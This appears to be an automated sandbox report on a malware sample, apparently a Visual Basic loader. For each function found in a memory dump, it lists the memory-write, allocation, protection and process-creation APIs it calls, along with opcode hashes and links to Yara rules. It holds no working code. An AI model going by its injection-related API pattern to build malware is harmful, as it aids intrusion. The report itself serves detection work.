API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 5e4d6d40ae358ca99ec936dce49f93d6d363eac1a3d3ecd709d0b82b4c1998f4
Instruction ID: 6ba96f29b73e33fecbc15b5d744db4854ac5685b3952495a40b5f160335cd184
Opcode Fuzzy Hash: 5e4d6d40ae358ca99ec936dce49f93d6d363eac1a3d3ecd709d0b82b4c1998f4
Instruction Fuzzy Hash: 3351CD75919288DFCF358F78CC85BD9BBB2FF09300F45001AD9489B225CB719A56CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0227D1EB, Relevance: 1.6, APIs: 1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 003a8edd6f01f03f3f9c6bf8558138a1b812c502f0f7a2df1abb381f682eb362
Instruction ID: 481c81b9f6da75d782748bb1a844660c310127e98703c83bfc54335128010648
Opcode Fuzzy Hash: 003a8edd6f01f03f3f9c6bf8558138a1b812c502f0f7a2df1abb381f682eb362
Instruction Fuzzy Hash: 4B51E132624249DFCB35DEA8C9D87EA3BB2BF56310F40412ACC0A9B359D771DA41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0227768F, Relevance: 1.6, APIs: 1, Instructions: 141nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: ff569479804c31544b6eb60e26731c957ba01aa915667db60bd89770cff38353
Instruction ID: e9dccc7769d39cc9a93ad3aef59b96830b9b86f5956fb6767042d761b1c2ecf6
Opcode Fuzzy Hash: ff569479804c31544b6eb60e26731c957ba01aa915667db60bd89770cff38353
Instruction Fuzzy Hash: 8B51CD75519288DFCF359F78CC86BD97BB2FF09300F44401ADA489B225CB719A55CB82

Uniqueness

Uniqueness Score: -1.00%

Function 022783C3, Relevance: 1.6, APIs: 1, Instructions: 133memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(DA131614), ref: 02278528

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: ac2fc24b255f1f225d49b431f58cfadeb59d3651042e8fbabca3ca0e38634542
Instruction ID: 806933d6f0d6651ce663d5d49d4ff648fd68bb1149ec7daefabcba5614d7a31f
Opcode Fuzzy Hash: ac2fc24b255f1f225d49b431f58cfadeb59d3651042e8fbabca3ca0e38634542
Instruction Fuzzy Hash: 1D4145B54483888FEF20CF29CC857D97BE2EF9A354F160119CC885B265D7718A06DF52

Uniqueness

Uniqueness Score: -1.00%

Function 02277754, Relevance: 1.6, APIs: 1, Instructions: 125nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: c7fc8d6a0d34b4ec4786d86f767c8e3b982fc001a800c69b23410291a859fe3e
Instruction ID: cccbac46789cbaac6255f7ec5eddc1c8f6d0e5e92d2637626cec0ce61ac37438
Opcode Fuzzy Hash: c7fc8d6a0d34b4ec4786d86f767c8e3b982fc001a800c69b23410291a859fe3e
Instruction Fuzzy Hash: 7141DE75959288DFCF259F68CC86BD97BA1FF0E300F440156EA489B225CB314A16DF92

Uniqueness

Uniqueness Score: -1.00%

Function 02277FB9, Relevance: 1.6, APIs: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(0000D1B7,2E806EBE), ref: 02278127

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 34b5ccfd16e43f9e7b461b8562ffee9768d9eace3f035cd0d9ce65996a844d73
Instruction ID: cfce50f64a70a92b5317da19d4015d9f585b1fbce1fc7a36fd754ac37cddd6bb
Opcode Fuzzy Hash: 34b5ccfd16e43f9e7b461b8562ffee9768d9eace3f035cd0d9ce65996a844d73
Instruction Fuzzy Hash: 5D31CB398183058FEB18AF34C9062D6BBE2FF62784F86064DC9845B218C7714946CF93

Uniqueness

Uniqueness Score: -1.00%

Function 0227ADAD, Relevance: 1.6, APIs: 1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a30f993026eefe70f0a5345b3c8a48e7e5c75731eb67883d8cbe115e2bcb035
Instruction ID: 7a0f2a528545a1cbd7c2c613618de5fdf0442328b6dd42deb30e16f76bc8020e
Opcode Fuzzy Hash: 9a30f993026eefe70f0a5345b3c8a48e7e5c75731eb67883d8cbe115e2bcb035
Instruction Fuzzy Hash: 2831AD75229346DFCB35DF98C994BEE33A1FF49320F00803AE94A8B218D7749A40CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02279224, Relevance: 1.5, APIs: 1, Instructions: 39libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 022792BC

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 11e82afc48991c5da88491074d63946ddb092e3448f364409c192ec31bd7a0f2
Instruction ID: 86de266dacbf55785d76178364c8a2ad5444c6bc9073389cc4b898ce04350c9d
Opcode Fuzzy Hash: 11e82afc48991c5da88491074d63946ddb092e3448f364409c192ec31bd7a0f2
Instruction Fuzzy Hash: 34F0243A1181845ECB019EB8D482786BBD8AFA33147A85184C8D14B06ADA75D502CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 0227CB17, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 0227CB51

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 143cec6cb2dd2c5e9a45129ada6bf0d57a02bb282743625b1a5ea9a5a9a99ed0
Instruction ID: 95495026e8e24dc104026ba35bb2735d86f7cf5f397fc8a43bc7b63c15142c2c
Opcode Fuzzy Hash: 143cec6cb2dd2c5e9a45129ada6bf0d57a02bb282743625b1a5ea9a5a9a99ed0
Instruction Fuzzy Hash: DBE0D83D55AA848DCF01CA58C59B580BF90AE1795438A12C0C2201F326DE72992BEEF3

Uniqueness

Uniqueness Score: -1.00%

Function 0227CAAA, Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 0227CB51

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 13dc4c4d8e8051dd5b11390641ecd8eba5409ef7b3f6b5a553902e1e786b9066
Instruction ID: 407dc1cccd2d27b7953a6c8af5915d6afcbda4eb8d0040efb4aa2e20d9bf7837
Opcode Fuzzy Hash: 13dc4c4d8e8051dd5b11390641ecd8eba5409ef7b3f6b5a553902e1e786b9066
Instruction Fuzzy Hash: 81F0EC716142849FDB34DE69C999AEE77E6FBC8300F148529E9499B204D770AF00CB51

Uniqueness

Uniqueness Score: -1.00%

Function 022724A8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-325AD4C3), ref: 02277DA5

Strings

GI'B, xrefs: 02272599

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID: GI'B
API String ID: 560597551-450599694
Opcode ID: 6d3661bcabdada9e71e2e3550733253667383071f2db526cd076bea2d7996896
Instruction ID: 56388aa601028c42cb3e64a594b10221d61a3ecd9a6159b99ab86e6e90cf9437
Opcode Fuzzy Hash: 6d3661bcabdada9e71e2e3550733253667383071f2db526cd076bea2d7996896
Instruction Fuzzy Hash: F0116A75018AC69BC722EA28884A79BFFB1BF86314F44C689C4445B25ADB304101C782

Uniqueness

Uniqueness Score: -1.00%

Function 00401640, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401645

Strings

VB5!6&*, xrefs: 00401640

Memory Dump Source

Source File: 00000002.00000002.238038167140.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.238038120792.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.238038419710.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.238038485259.0000000000426000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 7b1a76c332887b91199b04cafa039e9114888b9a0caa35bb048b1a9f825c8645
Instruction ID: eca36ad3341b39b6f8191c893ce71dd04855fd79c9a11be9aa4403621963bba4
Opcode Fuzzy Hash: 7b1a76c332887b91199b04cafa039e9114888b9a0caa35bb048b1a9f825c8645
Instruction Fuzzy Hash: C3E024A144F3D10FD30797759C26586BF70AD2326030E05EBD0CADB4E3C96E184AC762

Uniqueness

Uniqueness Score: -1.00%

Function 0227D2DA, Relevance: 1.7, APIs: 1, Instructions: 152processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE ref: 0227D5B1

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 8f11067599dff809047ab5934e6ba828040ab97080ecff2a0f078f9254f8e272
Instruction ID: b8fb5c1b4e8ebb10dead6b3b9620a3f159146a8b32c410d68450b4fd5462d045
Opcode Fuzzy Hash: 8f11067599dff809047ab5934e6ba828040ab97080ecff2a0f078f9254f8e272
Instruction Fuzzy Hash: 99510035624649DFCF258EA8C9D97DA3BB1BF1A324F450156CC089F358CB719A02CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0227D3E3, Relevance: 1.6, APIs: 1, Instructions: 130processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE ref: 0227D5B1

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 3a35eb3528416c7081e731b8676f624ff842b681935ae08b565a670bcb20e335
Instruction ID: 3d0d4f297ae7f03dd0958f9237cefcf8a21fb5684319f4747e0e320eaa1d6fb2
Opcode Fuzzy Hash: 3a35eb3528416c7081e731b8676f624ff842b681935ae08b565a670bcb20e335
Instruction Fuzzy Hash: 1541E331528248DFCF25CEA8D9D57DA3B62BF4A324F40415ACC085F259CB319A42CF62

Uniqueness

Uniqueness Score: -1.00%

Function 0227D397, Relevance: 1.6, APIs: 1, Instructions: 114processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE ref: 0227D5B1

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: ba419dc680036885fa2ee6a4765b5c1dee399431f87ecb0e6525bb8c468f7fcf
Instruction ID: 10fcdca93d091b368c762328bcd2425bb029f3f07662732acd2ee35c65ef08ee
Opcode Fuzzy Hash: ba419dc680036885fa2ee6a4765b5c1dee399431f87ecb0e6525bb8c468f7fcf
Instruction Fuzzy Hash: 6841DF72624649DFCB35DEA8CDD87EA3B72BF5A320F40411ACC099B258D7319A41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 022700BB, Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24a59d85e7737b568d049d398db7c07e667c93f9e583274b45d1959874c615f0
Instruction ID: 7a7542ccbeda9ebc332b7245ce0332ab0a27afdef9ffbd047d284de54c705c7e
Opcode Fuzzy Hash: 24a59d85e7737b568d049d398db7c07e667c93f9e583274b45d1959874c615f0
Instruction Fuzzy Hash: A731F17567C74ADBDB31AEC48D817ED3766AF463A0F000035DD8A4A25DE3B14A45CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0227D485, Relevance: 1.6, APIs: 1, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE ref: 0227D5B1

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 99ecfdc5c385d6b4a6f35d9ac701827dc098f2d881f068118526104f3ea91002
Instruction ID: 67dbf3b3a0e52c8b4514bd50fe014eee63bedd49d38ec351c3658bc68b4893f0
Opcode Fuzzy Hash: 99ecfdc5c385d6b4a6f35d9ac701827dc098f2d881f068118526104f3ea91002
Instruction Fuzzy Hash: 80210035614289DFCF29CE58D9E67DA3B62AF47324F810249CC190F258CB319A42CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0227A687, Relevance: 1.6, APIs: 1, Instructions: 67libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(C7797899), ref: 0227A75F

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 920eeae579014279b4934703448bb9bb0a142801afd5b3eed3b01265043347bf
Instruction ID: ca5540395c2a479208063eb775030a30c1e3d73d4e09084665e6378636531811
Opcode Fuzzy Hash: 920eeae579014279b4934703448bb9bb0a142801afd5b3eed3b01265043347bf
Instruction Fuzzy Hash: FC11EE3815C78ADFDF219F94D892BEC3B60EF06764F404165DA591F219C7715A02CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0227B40E, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2c61dbdf97bda318018df76b8ee53d165b4950176d21bb0939f0decb37c4cf
Instruction ID: 8ccadc0dc6d436be36663bf4ae31a4858bd353f436bd3fba1e4ee2a38a3479b6
Opcode Fuzzy Hash: 2b2c61dbdf97bda318018df76b8ee53d165b4950176d21bb0939f0decb37c4cf
Instruction Fuzzy Hash: 8A11C17822C34BEFDF31AE8489A07ED3665EF453B4F508139DD4A4A148D3B50A41CB01

Uniqueness

Uniqueness Score: -1.00%

Function 022724D8, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-325AD4C3), ref: 02277DA5

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 30e7df131dd4b819c09982eca7c3bbdf70afd7ebbca9ec221741486aa461fefe
Instruction ID: 7cc403f185f3cb4c0c9bb243faffe1395b2fca48b51de258cc51911359e61e58
Opcode Fuzzy Hash: 30e7df131dd4b819c09982eca7c3bbdf70afd7ebbca9ec221741486aa461fefe
Instruction Fuzzy Hash: 1C11213C1096498FDB10DE29C49A685BFD0EF8B685F499680C9001F325DE708603CFE3

Uniqueness

Uniqueness Score: -1.00%

Function 0227D55A, Relevance: 1.6, APIs: 1, Instructions: 58processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE ref: 0227D5B1

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: fa64efc0898ae0758c565d68f37758be835f679a15793d87c61569f6655fddc3
Instruction ID: 00d272e02eabd2a23508b13d41d76b68db4791f04939e2ebb1c6075385260dc5
Opcode Fuzzy Hash: fa64efc0898ae0758c565d68f37758be835f679a15793d87c61569f6655fddc3
Instruction Fuzzy Hash: F301F73C199688CECF168E68C9AB3C07F51AF076A4B451280C9101F355CF72980BDEE3

Uniqueness

Uniqueness Score: -1.00%

Function 02278023, Relevance: 1.5, APIs: 1, Instructions: 46fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(0000D1B7,2E806EBE), ref: 02278127

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1a54bcf8e012d621a49501ad146e5dfb63a9d9dc369c400fcd430e4766943665
Instruction ID: e1a9cc2ab1aef9dfb8b5eb7d731f3b3c2c551dc5c27d08c808319a77d51b1acd
Opcode Fuzzy Hash: 1a54bcf8e012d621a49501ad146e5dfb63a9d9dc369c400fcd430e4766943665
Instruction Fuzzy Hash: 16113274919352CFEB68BF74C8047EABBA2FF21350F414A0EC9C256118D3704980CB47

Uniqueness

Uniqueness Score: -1.00%

Function 0227A6DC, Relevance: 1.5, APIs: 1, Instructions: 39libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(C7797899), ref: 0227A75F

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 187f275e19aa2571e4a8ecb1c16923fa80790abfa76b356713722947474f57e1
Instruction ID: c61f8e3306ac66de277e85a23e5118c08ad4e7e82aca92f0d682601a94877c50
Opcode Fuzzy Hash: 187f275e19aa2571e4a8ecb1c16923fa80790abfa76b356713722947474f57e1
Instruction Fuzzy Hash: 8701817426C39BEBDF326FA4D990BEC3771EF45764F404179D9598E148C3B41A018B02

Uniqueness

Uniqueness Score: -1.00%

Function 0227243B, Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-325AD4C3), ref: 02277DA5

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 55f3d56b409931cf0e8585ea8cd5b93068473410e60f9646e2312c39b291bea8
Instruction ID: 43c75a2d0ad823bb3b19c4b8045c369db85c59904c6b4761c731b19d737734aa
Opcode Fuzzy Hash: 55f3d56b409931cf0e8585ea8cd5b93068473410e60f9646e2312c39b291bea8
Instruction Fuzzy Hash: 550178714192AAEFDB32DF388805ADB7FF4FF89220F508D59D884EB212DA304601C782

Uniqueness

Uniqueness Score: -1.00%

Function 022780BF, Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(0000D1B7,2E806EBE), ref: 02278127

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d28bd673eeb6e8cdc5e04ced1f4e9a64c5c530f275c16c71703c399a55cdadec
Instruction ID: dc99ee295d1910f8c95c86bc6dc974b4b605bff187f793aef14057c8c4313834
Opcode Fuzzy Hash: d28bd673eeb6e8cdc5e04ced1f4e9a64c5c530f275c16c71703c399a55cdadec
Instruction Fuzzy Hash: 79F0BE709293529BDB297F30C801BEABBA0FB113A0F46095ED8C666214D2704580CB46

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 022725B8, Relevance: 5.4, Strings: 4, Instructions: 426COMMON

Download Yara Rule

Strings

2w\, xrefs: 02272757
GI'B, xrefs: 02272599
K~|J, xrefs: 02272883
:<1n, xrefs: 022725D4

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 2w\$:<1n$GI'B$K~|J
API String ID: 0-3929196425
Opcode ID: 567c528ac2e2d03fb0c031721c4f4aedcf6e2010dd43cb8088599ae2e6f07c45
Instruction ID: 7f352c33ca014808838c0ee690468e6f3e01d28032253cba96db26fb2248d579
Opcode Fuzzy Hash: 567c528ac2e2d03fb0c031721c4f4aedcf6e2010dd43cb8088599ae2e6f07c45
Instruction Fuzzy Hash: 97D1773985D7898FCB25CE68C85A2D07FA0EF17254F491299C8900F252DB729917CFE3

Uniqueness

Uniqueness Score: -1.00%

Function 02278DD3, Relevance: 4.0, Strings: 3, Instructions: 258COMMON

Download Yara Rule

Strings

h~a, xrefs: 02278A97
j\u, xrefs: 02278B43
7ON_, xrefs: 02278BFE

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7ON_$h~a$j\u
API String ID: 0-3839618161
Opcode ID: 8fbdfd699491ee2e67a18d50d58e54dc78a9666551b0eff708b7669f0730cfa7
Instruction ID: b06ea5cabdaee89f3ea9f38c2b935c02e9114ca74dc5026f2682c1fa2645a2c8
Opcode Fuzzy Hash: 8fbdfd699491ee2e67a18d50d58e54dc78a9666551b0eff708b7669f0730cfa7
Instruction Fuzzy Hash: 49A1323255838ACFDF349E74CC4A7EABBA1EF15340F46441ADD899B214D7318A42DB93

Uniqueness

Uniqueness Score: -1.00%

Function 02278775, Relevance: 4.0, Strings: 3, Instructions: 237COMMON

Download Yara Rule

Strings

h~a, xrefs: 02278A97
j\u, xrefs: 02278B43
7ON_, xrefs: 02278BFE

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7ON_$h~a$j\u
API String ID: 0-3839618161
Opcode ID: c217c9aeea400d847413221ae096a5e9bdf7de0096b0e6f72b604b3bad483e72
Instruction ID: f5104d792fd68699900b0cb407ecdb96521d2ec0aa630adea0da83c59a6b31c2
Opcode Fuzzy Hash: c217c9aeea400d847413221ae096a5e9bdf7de0096b0e6f72b604b3bad483e72
Instruction Fuzzy Hash: 13A1313255838ACFDF349F75CC45BEA7BA1BF55340F46441ADD8AAB224D7308A42CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0227871A, Relevance: 4.0, Strings: 3, Instructions: 228COMMON

Download Yara Rule

Strings

h~a, xrefs: 02278A97
j\u, xrefs: 02278B43
7ON_, xrefs: 02278BFE

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7ON_$h~a$j\u
API String ID: 0-3839618161
Opcode ID: 14819ff224ee56c8c0ab2f9f05ff4fd1e8e92d7dd5b315ca30b4b62c5ea4ffb7
Instruction ID: fd882af0c9610d77814f2632fa72d4a9397f91dc5837e7cc890f92a5be60365e
Opcode Fuzzy Hash: 14819ff224ee56c8c0ab2f9f05ff4fd1e8e92d7dd5b315ca30b4b62c5ea4ffb7
Instruction Fuzzy Hash: AAA1BC3151838ACFDF349FB5CC45BEE77A2AF54340F45842ADC8AAB224D7314A81DB52

Uniqueness

Uniqueness Score: -1.00%

Function 02278D8E, Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

h~a, xrefs: 02278A97
j\u, xrefs: 02278B43
7ON_, xrefs: 02278BFE

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7ON_$h~a$j\u
API String ID: 0-3839618161
Opcode ID: 48123961dc61f46798dd7c08b5f962bcc54bb169cd9aa8416fbc7c5de2ed8e7b
Instruction ID: 9dfc85dcbaaa6c37421de39fae1fff29e67a1699ea8621fb790a342f1cedc24f
Opcode Fuzzy Hash: 48123961dc61f46798dd7c08b5f962bcc54bb169cd9aa8416fbc7c5de2ed8e7b
Instruction Fuzzy Hash: 3291313655838ACFDF349F75CC4A7EABBA0AF15340F46441ADC899B224D7308A42DB93

Uniqueness

Uniqueness Score: -1.00%

Function 022787CE, Relevance: 4.0, Strings: 3, Instructions: 209COMMON

Download Yara Rule

Strings

h~a, xrefs: 02278A97
j\u, xrefs: 02278B43
7ON_, xrefs: 02278BFE

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7ON_$h~a$j\u
API String ID: 0-3839618161
Opcode ID: d607f6c8683063060e52a635aecf93f8acb1e3a6c69128f25806d5138e9b7784
Instruction ID: 3e1604f85a6d72f78053615bbe4408402b59a876bfbadead7f6d5e339c638464
Opcode Fuzzy Hash: d607f6c8683063060e52a635aecf93f8acb1e3a6c69128f25806d5138e9b7784
Instruction Fuzzy Hash: 6591313255838ACFDF348F75CC497EA7BA1BF55340F46441ADD89AB224D7308A42DB92

Uniqueness

Uniqueness Score: -1.00%

Function 022788C6, Relevance: 3.9, Strings: 3, Instructions: 189COMMON

Download Yara Rule

Strings

h~a, xrefs: 02278A97
j\u, xrefs: 02278B43
7ON_, xrefs: 02278BFE

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7ON_$h~a$j\u
API String ID: 0-3839618161
Opcode ID: 0f16a91a4fdcea4402eb72306f6f0b29afc925a21ef3c8844f0ff80ca251e89d
Instruction ID: 66dd7b0e2330d92bbd36034b61039cf7f51ac3304c9603a12e20095fb4343fef
Opcode Fuzzy Hash: 0f16a91a4fdcea4402eb72306f6f0b29afc925a21ef3c8844f0ff80ca251e89d
Instruction Fuzzy Hash: 1471223554838ACFDF348E75CC49BEA7BA1BF59340F46801ADD499B224D7318A42DF92

Uniqueness

Uniqueness Score: -1.00%

Function 02278877, Relevance: 3.9, Strings: 3, Instructions: 168COMMON

Download Yara Rule

Strings

h~a, xrefs: 02278A97
j\u, xrefs: 02278B43
7ON_, xrefs: 02278BFE

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7ON_$h~a$j\u
API String ID: 0-3839618161
Opcode ID: a54d66bf525573125c84d988da9b156a193a8a43570e92d9c46c9f9310daf23c
Instruction ID: 821f319ef06169bb910b300e8bfb874c84b2f075c7786e694e5c0a0ab502f7c8
Opcode Fuzzy Hash: a54d66bf525573125c84d988da9b156a193a8a43570e92d9c46c9f9310daf23c
Instruction Fuzzy Hash: 2C71FF3255838ACFDF349E75CC45BEE77A1BF54340F46842E9C8AAB224D7308A81DB52

Uniqueness

Uniqueness Score: -1.00%

Function 0227895F, Relevance: 3.9, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

h~a, xrefs: 02278A97
j\u, xrefs: 02278B43
7ON_, xrefs: 02278BFE

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7ON_$h~a$j\u
API String ID: 0-3839618161
Opcode ID: acf5813ddc10e91602b3b4e188766b424ae4fd79355a7f23ba9bb1c280fc3a0b
Instruction ID: 91511c5a146d25f625631c6c80974669e8dd712e26ba058dba0942a3f50e54ce
Opcode Fuzzy Hash: acf5813ddc10e91602b3b4e188766b424ae4fd79355a7f23ba9bb1c280fc3a0b
Instruction Fuzzy Hash: E351423554838ACFDF349E75CC09BEA7BA1FF55340F46801ADD499B214E7318A42DB92

Uniqueness

Uniqueness Score: -1.00%

Function 02278A09, Relevance: 3.9, Strings: 3, Instructions: 134COMMON

Download Yara Rule

Strings

h~a, xrefs: 02278A97
j\u, xrefs: 02278B43
7ON_, xrefs: 02278BFE

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7ON_$h~a$j\u
API String ID: 0-3839618161
Opcode ID: 48b94450bc500dd0fd286b91235140ea484a090b5eb18440e0160a0cb177c4d8
Instruction ID: 4479a83e425be71bcc6b53da3db8c974f9f671b4eb0e7f6ac2129349babf436b
